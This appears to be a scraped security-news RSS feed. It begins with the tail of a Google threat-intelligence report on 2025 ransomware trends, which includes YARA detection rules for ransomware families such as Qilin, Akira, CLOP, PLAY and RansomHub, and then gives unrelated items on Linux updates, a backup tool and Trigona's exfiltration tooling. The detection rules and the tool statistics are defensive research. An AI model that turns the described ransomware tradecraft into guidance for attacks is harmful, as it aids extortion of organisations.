<p role="presentation"><span>Less frequently, we observed the penetration frameworks associated with MYTHICAGENT, METASPLOIT, HAVOC, and EXPLORATIONC2.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Extending a trend identified last year, threat actors appear slightly less reliant on remote management tools. Around 24% of 2025 incidents involved at least one RMM, compared to 28% in 2024, and 40% in 2023.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed 10 unique remote management tools in ransomware incidents in 2025 comparable to nine in 2024, but an overall decrease from 13 in 2023.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We also saw a decrease in instances of threat actors leveraging multiple different RMMs within the same intrusion. In 2025, multiple RMMs were only observed in ~5% of incidents, compared to 8% in 2024, and 16% in 2023.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Consistent with recent years, AnyDesk remained the most commonly deployed RMM in ransomware incidents in 2025; however, overall use decreased from roughly 31% in 2023 and 16% in 2024 to 10% in 2025.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors' use of tunnelers remained fairly consistent as compared to 2024; however, there were small shifts in the use of specific tunnelers. For example, CLOUDFLARED was observed in 8% of incidents in 2025 compared to around 4% in 2024.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We've observed a negligible decline in the use of SYSTEMBC, with around 14% of incidents involving the tunneler in 2023, a little over 7% in 2024, and down to a little over 6% in 2025. Notably, Operation Endgame </span><a href="https://www.europol.europa.eu/media-press/newsroom/news/largest-ever-operation-against-botnets-hits-dropper-malware-ecosystem" rel="noopener" target="_blank"><span>disrupted</span></a><span> SYSTEMBC infrastructure in May 2024; while the malware is still being sold on forums, it's plausible that the law enforcement disruption dissuaded some threat actors from continuing to use the malware in their operations.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Throughout 2025, threat actors continued to leverage common publicly available network scanning tools such as Advanced IP Scanner and SoftPerfect Network Scanner in around 50% of intrusions, consistent with the 2024 rate.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In 2025, we observed an increase in the use of public tools like WinRAR and Rclone that are often used by threat actors to facilitate data theft, which aligns with our overall increase in incidents involving suspected or confirmed data theft from 2024 to 2025. Both WinRAR and Rclone were observed in approximately 23% of incidents; in 2024, we observed around 16% of intrusions involving Rclone and only around 8% involving WinRAR.</span></p>
</li>
</ul>
<h3><span>Remediation and Hardening</span></h3>
<p><span>Recommendations to assist in addressing the threat posed by ransomware are captured in our white paper, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ransomware-protection-and-containment-strategies"><span>Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment</span></a><span>. </span></p>
<h3><span>Outlook and Implications</span></h3>
<p><span>Despite ongoing turmoil caused by actor conflicts and disruption, ransomware actors remain highly motivated and the extortion ecosystem demonstrates continued resilience. Several indicators suggest the overall profitability of these operations is, however, declining, and at least some threat actors are shifting their targeting calculus away from large companies to instead focus on higher volume attacks against smaller organizations. This is likely due to increased difficulty in successful deployments due to victims' improved security postures, a greater refusal to pay ransom demands, and enhanced recovery capabilities. In the coming years, evolving regulations, including reporting requirements and payment bans, may further dissuade some companies from making ransom payments. While we anticipate ransomware to remain one of the most dominant threats globally, the reduction in profits may cause some threat actors to seek other monetization methods. This could manifest as increased data theft extortion operations, the use of more aggressive extortion tactics, or opportunistically using access to victim environments for secondary monetization mechanisms such as using compromised infrastructure to send phishing messages.</span></p>
<h3><span>Detections</span></h3>
<h4><span>YARA Rules</span></h4>
<h5><span><span>AGENDA</span></span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APTFIN_Ransom_AGENDA_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$conf1 = "public_rsa_pem" fullword
		$conf2 = "private_rsa_pem" fullword
		$conf3 = "directory_black_list" fullword
		$conf4 = "file_black_list" fullword
		$conf5 = "file_pattern_black_list" fullword
		$conf6 = "process_black_list" fullword
		$conf7 = "win_services_black_list" fullword
		$conf8 = "company_id" fullword
		$conf9 = "note" fullword
		$load_const1 = { 21 B7 F6 F7 }
		$load_const2 = { F6 36 A4 69 }
		$load_s1 = "run_portable_executable" fullword
		$load_s2 = "MemoryLoadLibrary" fullword
		$load_s3 = "_ZN9morph_poc4main"
		$note1 = "Extension: "
		$note2 = "Domain: "
		$note3 = "login: "
		$note4 = "password: "
		$note5 = "Enter credentials-- Credentials"
		$note6 = "-- Qilin"
		$note7 = "-- Recovery"
		$note8 = "www.torproject.org"
		$note9 = ".onion"
		$note10 = "Employees personal data, CVs, DL , SSN."
		$note11 = "%s/%s_RECOVER.txt"
	condition:
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (7 of ($conf*) or 7 of ($note*) or all of ($load*))
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>AGENDA.RUST</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Win_Ransomware_AGENDA_RUST_2_MBeta {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$rust = "/rust/"
		$conf1 = "\"public_rsa_pem\":"
		$conf2 = "\"private_rsa_pem\":"
		$conf3 = "\"directory_black_list\":"
		$conf4 = "\"file_black_list\":"
		$conf5 = "\"file_pattern_black_list\":"
		$conf6 = "\"process_black_list\":"
		$conf7 = "\"win_services_black_list\":"
		$conf8 = "\"company_id\":"
		$conf9 = "\"n\":"
		$conf10 = "\"p\":"
		$conf11 = "\"fast\":"
		$conf12 = "\"skip\":"
		$conf13 = "\"step\":"
		$conf14 = "\"accounts\":"
		$conf15 = "\"note\":"
	condition:
		uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and filesize &lt; 5MB and (($rust and 8 of ($conf*)) or (13 of ($conf*)))
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>REDBIKE</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_REDBIKE_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$a1 = ".akira"
		$a2 = "akira_readme.txt"
		$a3 = "akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id"
		$s1 = "--encryption_percent" ascii wide nocase
		$s2 = "--encryption_path" ascii wide nocase
		$s3 = "--share_file" ascii wide nocase
	condition:
		((all of ($s*)) and (any of ($a*))) and (uint16(0) == 0x5A4D) and filesize &gt; 500KB and filesize &lt; 2MB
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>REDBIKE.LINUX</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APTFIN_Ransom_REDBIKE_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$a = "akira_readme.txt"
		$b = "save your TIME, MONEY, EFFORTS"
		$c = "akiral2iz6a7qgd3ayp3l6yub7xx2uep76idk3u2kollpj5z3z636bad.onion"
		$d = "--encryption_percent"
		$e = "--encryption_path"
		$f = "--share_file"
	condition:
		all of them and (uint32be(0) == 0x7F454C46)
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>CLOP</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_CLOP_rol7XorHash32_ConfigHashes_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$hex_asm_literal_a = { 92 F7 53 7A }
		$hex_asm_literal_b = { 43 29 79 71 }
		$hex_asm_literal_c = { 2A 81 C4 E2 }
		$hex_asm_literal_d = { 2E F4 FA 7E }
		$hex_asm_literal_e = { 31 E5 7F 91 }
		$hex_asm_literal_f = { 16 24 45 D6 }
		$hex_asm_literal_g = { 56 22 93 EA }
	condition:
		all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>CLOP.LINUX</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_CLOP_3 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str_jobmessage_a = "Successfully started daemon-name"
		$str_jobmessage_b = "Could not change working directory to /"
		$str_jobmessage_c = "Could not generate session ID for child process"
		$asm_code_fileordirectory = { 25 00 F0 00 00 3D 00 40 00 00 75 }
		$asm_functioncall_open64_readfile = { 80 01 00 00 C7 44 ( 2? | 6? | A? | E? ) ?? 02 00 00 00 }
		$asm_functioncall_open64_writebytes = { B4 01 00 00 C7 44 ( 2? | 6? | A? | E? ) ?? 42 00 00 00 }
		$asm_encryption_filebuffersize = { 00 E1 F5 05 76 ?? C7 45 ?? 00 E1 F5 05 }
		$asm_encryption_generatekey = { 1F 89 ( C? | D? | E? | F? ) C1 ( C? | D? | E? | F? ) 18 8D ( 0? | 1? ) ( 0? | 1? ) 25 FF 00 [0-2] 29 ( C? | D? | E? | F? ) 83 ( C? | D? | E? | F? ) 01 C9 }
	condition:
		uint32(0) == 0x464C457F and all of ($str_*) or (#asm_code_fileordirectory == 2 and #asm_functioncall_open64_writebytes == 2 and ($asm_encryption_generatekey and $asm_functioncall_open64_readfile and $asm_encryption_filebuffersize))
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>PLAYCRYPT</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransomware_PLAYCRYPT_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
		date_created = "2022-12-21"
		date_modified = "2022-12-21"
		rev = "1"
	strings:
		$c1 = { 8A CB 0F B6 D0 8B F2 8B FA D3 EE 8D 4B 01 D3 EF 83 E6 01 83 E7 01 }
		$c2 = { 8D 45 F0 C7 85 D0 FD FF FF 00 00 00 00 50 83 EC 08 }
		$c3 = { 8B 14 0A 8B 4C 32 20 03 D6 89 55 E0 03 CE }
		$c4 = { 8D 8D 80 ?? FF FF E8 C8 ?? FF FF 85 C0 75 61 83 BD [2] FF FF 05 76 58 }
		$c5 = { FF 76 ?? C6 45 EE 00 E8 [2] 00 00 8B F0 8B CF 33 C0 85 F6 0F 48 F0 E8 }
		$c6 = { FF D0 8B F8 83 FF 05 0F [2] 01 00 00 83 FF 06 0F [2] 01 00 00 8B 0E 3B 4E 04 0F [2] 01 00 00 83 FF 04 74 6D 83 FF 01 }
		$s1 = "OpaqueKeyBlob" wide
		$s2 = "AppPolicyGetProcessTerminationMethod"
	condition:
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize &gt; 100KB and filesize &lt; 200KB and ((2 of ($c*) and all of ($s*)) or (4 of ($c*)))
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>PLAYCRYPT.LINUX</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_PLAYCRYPT_LINUX_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "First step is done."
		$s2 = "/dev/urandom"
		$s3 = "esxcli storage filesystem list &gt; storage"
		$s4 = "hosts in exclusion:"
		$s5 = "encrypt: "
		$s6 = ".PLAY" fullword
	condition:
		uint32(0) == 0x464C457F and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>SAFEPAY</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>import "pe"

rule G_Ransom_SAFEPAY_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$hex_asm_snippet = { 10 27 00 00 [0-4] 10 27 00 00 }
	condition:
		pe.imphash() == "ff67c703589f775db9aed5a03e4489b0" and ($hex_asm_snippet)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_SAFEPAY_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$code_string_decode = { 8A C2 32 C1 32 44 0D ?? 34 ?? 88 44 0D ?? 41 83 F9 04 [4-64] B? 4D 5A 00 00 }
		$code_hardware_aes_check = { 0F A2 8B F3 5B 89 07 89 77 ?? 89 4F ?? 89 57 [0-12] ( 00 00 00 02 | C1 ?? 19 ) }
		$code_encrypt_file = { 14 00 10 00 [2-24] 14 00 10 00 [2-32] 00 10 00 5? [0-8] FF ( 15 | D? ) }
		$enc_str1 = { C7 45 ?? 67 4B 3D 49 C7 45 ?? 2F 4F 2F 4D }
		$enc_str2 = { C7 45 ?? 10 3C 51 3E C7 45 ?? 5C 38 4F 3A C7 45 ?? 42 34 58 36 C7 45 ?? 43 30 58 32 66 C7 45 ?? 2D 2C }
		$enc_str3 = { C7 45 ?? A3 8F FF 8D C7 45 ?? EF 8B E4 89 C7 45 ?? E0 87 E0 85 C7 45 ?? E7 83 EC 81 C7 45 ?? FB 9F E8 9D C7 45 ?? FF 9B 98 99 }
		$enc_str4 = { C7 45 ?? 44 40 51 47 C7 45 ?? 51 49 10 10 C7 45 ?? 03 48 43 42 C6 45 ?? 29 }
		$enc_str5 = { C7 45 ?? 77 77 73 74 C7 45 ?? 75 6D 64 70 C7 45 ?? 23 68 63 62 C6 45 ?? 09 }
	condition:
		uint16(0) == 0x5a4d and (all of ($code*) or (any of ($code*) and any of ($enc*)) or (2 of ($enc*)))
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>INC</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_INC_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[*] Count of arguments: %d" wide
		$s2 = "[-] Failed" wide
		$s3 = "[+] Start" wide
		$s4 = "INC-README" wide
		$s5 = "--debug" wide
		$s6 = "RECYCLE" wide
	condition:
		all of them and (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550)
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>INC (Lynx Branded)</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_INC_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[+] Proccess %s with PID: %d was killed succesffully" wide
		$s2 = "[*] Sending note to printer:" wide
		$s3 = "[+] Recycling bin..." wide
		$s4 = "[*] Starting full encryption in 5s" wide
		$s5 = "[+] Successfully decoded readme!" wide
		$s6 = "[-] Failed" wide
		$lynx = "lynx" ascii wide nocase
	condition:
		$lynx and 4 of ($s*) and (uint16(0) == 0x5A4D) and filesize &lt; 300KB and filesize &gt; 50KB
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>INC (Sinobi Branded)</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_INC_3 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[+] Proccess %s with PID: %d was killed succesffully" wide
		$s2 = "[*] Sending note to printer:" wide
		$s3 = "[+] Recycling bin..." wide
		$s4 = "[*] Starting full encryption in 5s" wide
		$s5 = "[+] Successfully decoded readme!" wide
		$s6 = "[-] Failed" wide
		$sin = "sinobi" ascii wide nocase
	condition:
		$sin and 4 of ($s*) and (uint16(0) == 0x5A4D) and filesize &lt; 400KB and filesize &gt; 50KB
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>INC.LINUX</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_INC_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[*] Count of arguments: %d"
		$s2 = "[-] Failed"
		$s3 = "[+] Start"
		$s4 = "INC-README"
		$s5 = "--debug"
		$s6 = "vmsvc"
	condition:
		all of them and uint32(0) == 0x464c457f
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>RANSOMHUB</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_RANSOMHUB_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str1 = "json:\"settings\""
		$str2 = "json:\"extension\""
		$str3 = "json:\"net_spread\""
		$str4 = "json:\"local_disks\""
		$str5 = "json:\"running_one\""
		$str6 = "json:\"self_delete\""
		$str7 = "json:\"white_files\""
		$str8 = "json:\"white_hosts\""
		$str9 = "json:\"credentials\""
		$str10 = "json:\"kill_services\""
		$str11 = "json:\"set_wallpaper\""
		$str12 = "json:\"white_folders\""
		$str13 = "json:\"note_file_name\""
		$str14 = "json:\"note_full_text\""
		$str15 = "json:\"kill_processes\""
		$str16 = "json:\"network_shares\""
		$str17 = "json:\"note_short_text\""
		$str18 = "json:\"master_public_key\""
	condition:
		14 of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>FURYSTORM</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_FURYSTORM_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "Whitelist VM id"
		$s2 = "gwfn6l3bk45o2zecvi7xtyqrpsudmahj"
		$s3 = "Dry-run"
		$s4 = "-paths"
		$s5 = "-vmsvc"
		$s6 = "Note: motd=%d login=%d clean=%d"
		$s7 = "Cryptor args"
		$s8 = "VMX found"
		$s9 = "Keys: %016l"
		$s10 = "vim-cmd"
		$s11 = "Dropping readme"
		$s12 = "Encryption params"
	condition:
		uint32(0) == 0x464c457f and filesize &gt; 50KB and filesize &lt; 700KB and 6 of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_FURYSTORM_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "Failed decrypt file:"
		$s2 = "Decryptor args:"
		$s3 = "Private key loaded"
		$s4 = "Keys: %016l"
		$s5 = "Dry-run"
		$s6 = "Encryption params"
		$s7 = "Whitelist paths"
		$s8 = "Note: motd=%d"
	condition:
		uint32(0) == 0x464c457f and filesize &gt; 50KB and filesize &lt; 300KB and 6 of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>FIREFLAME</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Autopatt_Ransom_FIREFLAME_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$p00_0 = { 8B CE 8D 5F ?? 8A 01 8D 49 ?? 0F B6 C0 83 E8 ?? 8D 04 40 C1 E0 ?? 99 }
		$p00_1 = { 55 8B EC FF 75 ?? E8 [4] 59 8B 4D ?? 89 01 F7 D8 1B C0 }
	condition:
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (($p00_0 in (0 .. 380000) and $p00_1 in (260000 .. 280000)))
}</code></pre></div>
<div class="block-paragraph_advanced"><h3><span>Acknowledgements</span></h3>
<p><span>This analysis would not have been possible without the assistance of Dima Lenz, Chastine Altares, Ana Foreman, and the Advanced Practices, Mandiant Consulting, and FLARE teams. </span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (dovecot, fence-agents, freeipmi, git-lfs, image-builder, kernel, libsoup, osbuild-composer, and python-tornado), Debian (apache2, libdatetime-timezone-perl, lrzip, tzdata, and wireshark), Fedora (dovecot, forgejo-runner, gh, gnutls, krb5, nano, pdns...]]></description>
<link>https://tsecurity.de/de/3496080/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3496080/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 07 May 2026 15:14:23 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (dovecot, fence-agents, freeipmi, git-lfs, image-builder, kernel, libsoup, osbuild-composer, and python-tornado), <b>Debian</b> (apache2, libdatetime-timezone-perl, lrzip, tzdata, and wireshark), <b>Fedora</b> (dovecot, forgejo-runner, gh, gnutls, krb5, nano, pdns, pyOpenSSL, squid, vim, and xorg-x11-server-Xwayland), <b>Mageia</b> (graphicsmagick, kernel-linus, krb5-appl, libexif, libtiff, nano, nginx, ntfs-3g, opam, perl-Net-CIDR-Lite, perl-Starlet, perl-Starman, tcpflow, and virtualbox), <b>Oracle</b> (dovecot, fence-agents, freeipmi, image-builder, kernel, libcap, LibRaw, libsoup, openssh, osbuild-composer, python, python-tornado, python3, systemd, thunderbird, and tigervnc), <b>SUSE</b> (containerd, curl, erlang, flatpak, java-11-openjdk, java-21-openjdk, java-25-openjdk, liblxc-devel, libpng12, libthrift-0_23_0, openCryptoki, openexr, openssl-3, python3, python311-social-auth-core, rclone, skim, and thunderbird), and <b>Ubuntu</b> (apache2, coin3, editorconfig-core, insighttoolkit, linux, linux-aws, linux-aws-6.17, linux-gcp, linux-gcp-6.17, linux-hwe-6.17, linux-oracle, linux-realtime, linux-realtime-6.17, linux-azure, linux-azure-6.17, linux-oem-6.17, linux-azure-5.15, linux-gcp-6.8, nghttp2, python-dynaconf, slurm-wlm, swish-e, and webkit2gtk).]]></content:encoded>
</item>
<item>
<title><![CDATA[Pluton - Open source backup solution with End-to-End encryption with replication & Nice UI]]></title>
<description><![CDATA[About 2 years ago, I decided to move a few of my servers that contain precious data to some great deal VPSs I picked up during Black Friday from LET. After migrating all the data, I set up Duplicati on one of the servers to handle backups. While configuring it, I came across something pretty conc...]]></description>
<link>https://tsecurity.de/de/3486785/linux-tipps/pluton-open-source-backup-solution-with-end-to-end-encryption-with-replication-nice-ui/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3486785/linux-tipps/pluton-open-source-backup-solution-with-end-to-end-encryption-with-replication-nice-ui/</guid>
<pubDate>Mon, 04 May 2026 18:07:51 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>About 2 years ago, I decided to move a few of my servers that contain precious data to some great deal VPSs I picked up during Black Friday from LET. After migrating all the data, I set up Duplicati on one of the servers to handle backups.</p> <p>While configuring it, I came across something pretty concerning. Duplicati can silently corrupt backups over time. So when I actually need to restore data after a disaster, the backups might not even work. Realizing this made me feel like the whole migration was a mistake because those servers were managed and came with backup service.</p> <p>I wanted to move to Restic because it’s rock-solid, but as someone who prefers a UI over managing endless CLI scripts, it just wasn't clicking for me. I wanted a way to easily manage a 3-2-1 backup plan across different cloud providers without the headache. I then found Backrest and gave it a try, but the UI did not make much sense to me as I was not really aware of the restic terminologies back then(this was back in December 2024).</p> <p>Since I’m a developer, I decided to build my own solution. I thought it would take a month or two, but it ended up taking 16 months to get everything perfect. This is quite a long time for me, as I have been building various apps for a long time now, and most took me 3-4 months. </p> <p><strong>Here are the key Features of Pluton:</strong></p> <ul> <li><strong>Automated backups</strong> with encryption, compression, and retention policies powered by Restic</li> <li><strong>Backup Replication:</strong> Auto-backup your content to multiple cloud storage to create 3-2-1 backup plans.</li> <li><strong>Flexible scheduling</strong> for automated backup jobs with fine-grained retention policies</li> <li><strong>End-to-end encryption:</strong> Backups are totally encrypted from your local machine to your cloud storage.</li> <li><strong>70+ Storage Support:</strong> Store encrypted data to your favorite cloud storage (powered by rclone).</li> <li><strong>Easy Restore &amp; Download:</strong> Restore or download backed-up snapshot data easily with just a few clicks.</li> <li><strong>Event Notifications:</strong> Receive email, slack &amp; discord notifications for backup start, end, completion, or failure.</li> <li><strong>Auto Retry Logic:</strong> Automatically retries backups if they fail with customization options.</li> <li><strong>Intuitive UI:</strong> Manage everything from a single, clean interface.</li> <li><strong>Real-time Progress Tracking:</strong> Track the progress of backups in real time.</li> <li><strong>Extensive Logging:</strong> View app and backup logs right from the UI for better debugging.</li> <li><strong>Run Scripts before/after:</strong> Ability to run scripts before and after running backups.</li> <li><strong>2FA</strong>: Secure your dashboard with built-in 2-factor authentication.</li> </ul> <p>Pluton can be installed on Linux desktops (AppImage) and servers, and can also be deployed with Docker. Give it a try:</p> <p><a href="https://github.com/plutonhq/pluton">https://github.com/plutonhq/pluton</a></p> <p>Feedbacks appreciated.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/towfiqi"> /u/towfiqi </a> <br> <span><a href="https://i.redd.it/jqszxw5g44zg1.gif">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1t3gf6i/pluton_open_source_backup_solution_with_endtoend/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Trigona ransomware adopts custom tool to steal data and evade detection]]></title>
<description><![CDATA[Trigona ransomware now uses a custom command-line tool to steal data faster and evade detection, replacing tools like Rclone and MegaSync. Symantec researchers report that recent Trigona ransomware attacks used a custom-built data exfiltration tool instead of common utilities like…
Read more →
Th...]]></description>
<link>https://tsecurity.de/de/3465556/it-security-nachrichten/trigona-ransomware-adopts-custom-tool-to-steal-data-and-evade-detection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3465556/it-security-nachrichten/trigona-ransomware-adopts-custom-tool-to-steal-data-and-evade-detection/</guid>
<pubDate>Sun, 26 Apr 2026 12:21:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Trigona ransomware now uses a custom command-line tool to steal data faster and evade detection, replacing tools like Rclone and MegaSync. Symantec researchers report that recent Trigona ransomware attacks used a custom-built data exfiltration tool instead of common utilities like…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/trigona-ransomware-adopts-custom-tool-to-steal-data-and-evade-detection/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/trigona-ransomware-adopts-custom-tool-to-steal-data-and-evade-detection/">Trigona ransomware adopts custom tool to steal data and evade detection</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Trigona ransomware adopts custom tool to steal data and evade detection]]></title>
<description><![CDATA[Trigona ransomware now uses a custom command-line tool to steal data faster and evade detection, replacing tools like Rclone and MegaSync. Symantec researchers report that recent Trigona ransomware attacks used a custom-built data exfiltration tool instead of common utilities like Rclone or MegaS...]]></description>
<link>https://tsecurity.de/de/3465523/hacking/trigona-ransomware-adopts-custom-tool-to-steal-data-and-evade-detection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3465523/hacking/trigona-ransomware-adopts-custom-tool-to-steal-data-and-evade-detection/</guid>
<pubDate>Sun, 26 Apr 2026 12:06:16 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Trigona ransomware now uses a custom command-line tool to steal data faster and evade detection, replacing tools like Rclone and MegaSync. Symantec researchers report that recent Trigona ransomware attacks used a custom-built data exfiltration tool instead of common utilities like Rclone or MegaSync. This shift, seen in March 2026 incidents, gives attackers more control and […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by Fedora (anaconda, dnf5, firefox, flatpak-builder, libexif, minetest, nss, plasma-setup, python-blivet, rpki-client, and xorg-x11-server), Oracle (bind, kernel, osbuild-composer, thunderbird, webkit2gtk3, and wireshark), Red Hat (java-25-openjdk), SUSE (cacti, ...]]></description>
<link>https://tsecurity.de/de/3461633/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3461633/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 24 Apr 2026 15:25:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Fedora</b> (anaconda, dnf5, firefox, flatpak-builder, libexif, minetest, nss, plasma-setup, python-blivet, rpki-client, and xorg-x11-server), <b>Oracle</b> (bind, kernel, osbuild-composer, thunderbird, webkit2gtk3, and wireshark), <b>Red Hat</b> (java-25-openjdk), <b>SUSE</b> (cacti, cacti, cacti-spine, cockpit-machines, cockpit-podman, cockpit-tukit, csync2, flannel, gdk-pixbuf, go1.25-openssl, go1.26-openssl, haproxy, kernel, libcap, libpng16, libtree-sitter0_26, libvirt, ncurses, ntfs-3g_ntfsprogs, openssl-1_1, openssl-3, openvswitch, perl, python-pyOpenSSL, python311, rclone, sudo, and tomcat), and <b>Ubuntu</b> (gst-plugins-bad1.0, jq, libopenmpt, linux-ibm, linux-ibm-5.15, and php-league-commonmark).]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Deploy New Exfiltration Tool In Ransomware Attacks]]></title>
<description><![CDATA[Ransomware operators are shifting their tactics to stay under the radar. In recent attacks observed in March 2026, affiliates of the Trigona ransomware group tracked by Symantec as Rhantus abandoned popular off-the-shelf utilities like Rclone and MegaSync. Instead, these attackers deployed a cust...]]></description>
<link>https://tsecurity.de/de/3460368/it-security-nachrichten/hackers-deploy-new-exfiltration-tool-in-ransomware-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3460368/it-security-nachrichten/hackers-deploy-new-exfiltration-tool-in-ransomware-attacks/</guid>
<pubDate>Fri, 24 Apr 2026 09:07:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Ransomware operators are shifting their tactics to stay under the radar. In recent attacks observed in March 2026, affiliates of the Trigona ransomware group tracked by Symantec as Rhantus abandoned popular off-the-shelf utilities like Rclone and MegaSync. Instead, these attackers deployed a custom-developed exfiltration tool to steal victim data. This strategic pivot highlights a growing […]</p>
<p>The post <a href="https://cyberpress.org/ransomware-hackers-steal-data/">Hackers Deploy New Exfiltration Tool In Ransomware Attacks</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ransomware Gang Unveils Custom Data-Theft Tool]]></title>
